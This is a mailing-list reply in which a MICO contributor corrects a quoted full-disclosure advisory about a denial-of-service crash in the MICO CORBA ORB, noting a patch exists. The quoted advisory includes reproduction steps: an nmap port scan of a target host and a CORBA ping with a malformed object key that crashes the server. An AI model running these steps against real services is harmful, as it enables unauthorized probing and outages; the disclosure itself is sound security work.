Hello,
I would just like to add some corrections to disclosure below.
On Thu, 6 Jul 2006, tuergeist wrote:
== == == TOC == == ==
1. Affected Vendor
2. Affected Product
3. Vulnerability
4. Safety Hazard
5. Disclosure Timeline
6. Vendor Response
7. Patch / Workaround
8. Vulnerability Details
---------------------
== 1. Affected Vendor ==
Object Security
This information is incorrect. ObjectSecurity is not the vendor of the
MICO ORB. MICO is a free software project licensed under LGPL/GPL
licenses. ObjectSecurity is its long time user and contributor besides
lots of other companies and supporters.
== 2. Affected Products ==
MICO - Mico is CORBA, Open Source ORB
tested on Version
2.3.12RC3
2.3.12
and latest from repository
more infos: http://www.mico.org
== 3. Vulnerability ==
MICO crashes when contacted with wrong object key (part: orb-id or
orb-creation time)
Side note: object ID is opaque value, so we do not distinguish any part of
it as orb-id or orb-creation time. Perhaps you get this knowledge from
other ORB, but this is strickly ORB dependent.
== 4. Safety Hazard ==
critical, potential Denial-of-Service
== 5. Disclosure Timeline ==
2006-06-27 Problem found and analysed / tested with other versions
2006-06-29 Vulnerability reported to vendor and MICOs
devel-mailing-list
Unfortunately your email has not come to mico-devel@xxxxxxxx mailing list
yet. Also if you would like to contact directly ObjectSecurity with some
security issue, please consider using security@xxxxxxxxxxxxxxxxxx email
address next time.
2006-07-05 2nd mail to vendor and mailing-list
2006-07-06 Full disclosure
== 6. Vendor Response ==
None.
== 7. Patch / Workaround ==
No Patch avaible yet.
Patch is already available and the main MICO download page contains a link
to it: http://mico.org/down.html
possible Workarounds
a) Don't use MICO in or over public networks
b) Protect MICO with an (IIOP) firewall
== 8. Vulnerability Details ==
The following is for educational purposes only!
Start the orb, you'll crash # Example code
-> http://wwwstud.informatik.uni-rostock.de/~cb098/mico_bug.tgz
$ ./server
scan your target...
$ sudo nmap -sS -oM results.nmap -p 1-65535 192.168.1.10 /
| grep unknown
8010/tcp open unknown
49576/tcp open unknown
51140/tcp open unknown
One of these port could be the orb. Lets try to ping
(object._non_exists()) the last one. For this I'm using a special
handmade CORBA-Ping-Prog. It's also possible to use JacORBs pingo..
My JPing is avaible at
http://wwwstud.informatik.uni-rostock.de/~cb098/JPing.java
$ java JPing -p corbaloc:: 192.168.1.10:8010//200/1151845678/0/_5
orb.string_to_object ... ok
object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
vmcid: SUN minor code: 208 completed: Maybe
Side note: if you test fixed MICO together with your ping utility
running on top of JacORB, you will get COMM_FAILURE exception
too. That's because of a bug in JacORB which tries to use GIOP 1.2
although your corbaloc is defined in the way it should use GIOP
1.0. Also since MICO uses GIOP 1.0 by default it closes connection
immediately after receiving JacORB's GIOP 1.2 message. Anyway this
test runs well with patched MICO and either MICO server using GIOP 1.2
and JacORB or MICO server using default GIOP 1.0 and JDK ORB.
Cheers,
Karel
------------------------------------------------------------------------
Karel Gardas, Principal Software Engineer, ObjectSecurity Ltd.
St John's Innovation Centre, Cowley Rd., Cambridge CB4 0WS, UK
Tel. +44 1223 420252, Fax. +44 870 762 6041
USA: Tel.+1-800-898-9148, Fax +1-360-933-9591
kgardas@xxxxxxxxxxxxxxxxxx, www.objectsecurity.com
------------------------------------------------------------------------
